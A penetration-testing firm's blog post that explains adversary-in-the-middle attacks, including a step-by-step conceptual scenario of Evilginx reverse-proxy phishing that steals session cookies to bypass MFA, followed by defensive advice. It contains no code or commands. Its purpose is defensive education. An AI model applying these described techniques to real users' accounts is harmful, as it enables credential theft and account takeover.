As an offensive security company, we want to ensure our clients are aware of all the attack avenues used in Adversary-in-the-Middle (AiTM) attacks. In this article, we'll explore what AiTM attacks are and how you can protect your business from these types of attacks.
What are Adversary-in-the-Middle Attacks?
Protecting Against Adversary-in-the-Middle Attacks
What Are Adversary-In-The-Middle Attacks?
An adversarial man-in-the-middle (MITM) attack occurs when an attacker secretly intercepts and possibly alters the communication between two parties who believe they are directly communicating with each other. This type of attack can be extremely harmful, as it can allow attackers to eavesdrop on sensitive information or manipulate messages without the parties knowing. Some type of attacks includes the following:
1. Eavesdropping and Passive MITM Attacks
Wi-Fi Eavesdropping:Â Attackers can set up rogue Wi-Fi access points to intercept communication on unsecured networks. Users connected to these networks unknowingly expose their data to the attacker.
Packet Sniffing:Â Using tools like Wireshark, attackers can capture unencrypted data packets traveling over a network, allowing them to analyze sensitive information
.
2. Session Hijacking
Cookies Theft:Â Attackers intercept session cookies from an unprotected session (often using packet sniffing) and then use these cookies to impersonate the victim. This is commonly done in HTTP sessions if not secured with HTTPS.
SSL Stripping:Â Attackers downgrade a secure HTTPS connection to HTTP, tricking the user into an insecure connection. Tools like SSLstrip make this easier by automatically converting HTTPS requests to HTTP, making the traffic easier to intercept.
3. DNS Spoofing
DNS Cache Poisoning:Â Attackers modify DNS responses or entries to redirect users to malicious sites, making them believe they are accessing legitimate resources (e.g., fake banking or login pages).
Pharming:Â Redirects users to malicious websites by exploiting vulnerabilities in the DNS system, tricking them into divulging sensitive information or credentials.
4. ARP Spoofing
ARP Poisoning:Â Attackers send falsified ARP messages to a local network, associating their MAC address with the IP address of a legitimate device (such as the default gateway). This allows attackers to intercept and manipulate data flowing between the victim and the intended device.
Tools like Ettercap or Cain & Abel can automate ARP spoofing and facilitate MITM attacks, allowing attackers to monitor or alter the network traffic.
5. HTTPS Spoofing and SSL/TLS Downgrade Attacks
Certificate Spoofing:Â Attackers present a fake SSL certificate to a victim, making the user believe they have a secure connection. In reality, the attacker intercepts all communication.
TLS Downgrade Attacks (e.g., POODLE):Â Attackers force a connection downgrade to an older, less secure version of TLS, making it easier to decrypt and intercept sensitive information.
6. Email Hijacking and Phishing
Email MITM Attacks:Â Attackers intercept email communication, often using phishing tactics to gain login credentials and access private exchanges. They may then impersonate one party, redirect payments, or extract sensitive data.
BEC (Business Email Compromise):Â Attackers gain access to executive emails and redirect wire transfers or sensitive communications to their own accounts.
7. Man-in-the-Browser (MITB)
Malware Injection in Browsers: Attackers infect a user’s browser with malware or malicious extensions, allowing them to intercept and alter communications directly within the browser. This is often used to manipulate online banking sessions.
Keylogging and Form Grabbing: Malicious code records keystrokes or captures form submissions before they’re encrypted, allowing attackers to steal login credentials and other sensitive data.
Phishing involves the attacker sending a fraudulent email or message to the user that appears to be from a legitimate source. The message often contains a link to a fake website that looks like the target website, where the user is prompted to enter their login credentials.
If the user falls for the phishing attempt and enters their credentials on the fake site, the attacker can use EvilNginx to intercept their traffic and steal their session cookie. With this cookie, the attacker can then bypass Multi-Factor Authentication (MFA) and access the user's account without needing to enter a second factor.
How Evilginx Works
Reverse Proxy Setup: Evilginx acts as a man-in-the-middle by creating a phishing link that mirrors a legitimate site (e.g., Gmail, Facebook, or corporate portals). When the victim clicks this link, Evilginx forwards requests to the legitimate website, proxying the traffic between the user and the authentic service.
Credential and Cookie Capture: Since Evilginx relays data between the user and the legitimate site, it can capture credentials (username and password) entered by the user. Additionally, it can grab session cookies after the user successfully authenticates, bypassing MFA protections.
Session Hijacking: With the captured session cookies, attackers can hijack the victim's session. This enables them to log in to the victim's account from a separate device, circumventing MFA because they are using the authenticated session rather than re-entering credentials.
Key Features and Capabilities of Evilginx
Phishing Beyond Credentials: Unlike traditional phishing, Evilginx captures not only usernames and passwords but also session cookies. This allows attackers to bypass MFA.
Real-Time Attack: Evilginx operates in real-time, interacting directly with the legitimate website and victim simultaneously, so it can handle any additional authentication steps that might occur.
Customizable Phishlets: Evilginx uses "phishlets," which are configuration files designed for specific websites. These files define how Evilginx interacts with each targeted website, allowing attackers to build customized, highly convincing phishing pages that appear almost identical to legitimate sites.
TLS Support: Evilginx supports HTTPS, allowing the phishing page to have a legitimate-looking SSL certificate. This makes it harder for victims to detect that they’re not on the actual website.
Example Attack Scenario Using Evilginx
Preparation: The attacker configures a phishing URL using Evilginx, with a phishlet customized for a specific target, such as a corporate login portal or a popular web service like Office 365.
Phishing: The attacker sends the phishing URL to the victim via email, SMS, or social engineering methods.
Victim Login: The victim clicks the link and enters credentials, including any MFA requirements.
Credential and Session Capture: Evilginx captures the credentials and session cookies as they are passed through the proxy.
Session Hijack: Using the session cookie, the attacker logs in as the victim without needing to enter credentials again or bypass MFA.
Detection and Defense Against Evilginx
Defending against Evilginx and similar advanced phishing techniques requires proactive security measures:
Universal MFA with Hardware Tokens: Using MFA methods like FIDO2-based hardware tokens (YubiKey) helps prevent Evilginx from capturing session cookies. Unlike SMS or app-based 2FA, FIDO2 tokens cannot be easily relayed or replicated in this type of attack.
User Education: Training users to recognize suspicious URLs and warning signs of phishing attacks is critical. Encourage users to verify URLs carefully and avoid clicking links from unexpected or unverified sources.
Domain Monitoring: Regularly monitor for similar or lookalike domains that might be used to trick employees into entering credentials on a fake login page.
Adaptive Session Management: Use adaptive or risk-based session monitoring to detect unusual login behavior, such as login attempts from new devices, locations, or IP addresses, even if session cookies appear valid.
Implement Zero Trust: Adopting a Zero Trust architecture requires continual verification of users, devices, and access privileges, even for authenticated sessions, which can help detect and mitigate the impact of session hijacking.
Protecting Against Adversary-In-The-Middle Attacks
To protect against these attacks, it's important to educate employees on how to identify phishing attempts and avoid clicking on suspicious links. Companies should also implement robust security protocols such as MFA, strong password policies, and regular security assessments to identify potential vulnerabilities.
Defensive Strategies Against MITM Attacks
End-to-End Encryption: Encrypting data from the source to the destination, especially over unsecured networks, prevents interception by ensuring attackers can’t read intercepted data.
Mutual Authentication:Â Using protocols like TLS with mutual authentication ensures both parties authenticate each other, making it harder for attackers to impersonate either side.
Public Key Pinning and Certificate Transparency:Â Verifying certificates against a known database helps prevent attackers from presenting fraudulent certificates.
DNS Security Extensions (DNSSEC):Â DNSSEC provides security for DNS queries and responses, reducing the risk of DNS spoofing and cache poisoning.
Two-Factor Authentication (2FA):Â Adds a second layer of verification, making it harder for attackers to use stolen credentials in session hijacking or MITB attacks.
Achilleus's Social Engineering Solutions
As a penetration testing company, we can help our clients by simulating real-world AiTM attacks to identify weaknesses in their security infrastructure. This allows them to take proactive steps to secure their systems and protect against these types of attacks.
If you are interested in having a no-cost assessment performed, feel free to click on the below.
ABOUT ACHILLEUS
As a penetration testing company, we are a leading provider of comprehensive cybersecurity solutions for businesses of all sizes. Our innovative approach to security assessment and implementation ensures our clients get maximum protection against online threats so they can focus on their business without worrying about vulnerabilities.
With a team of highly knowledgeable experts at hand, we guarantee peace of mind with every solution built from experience and expertise!
コメント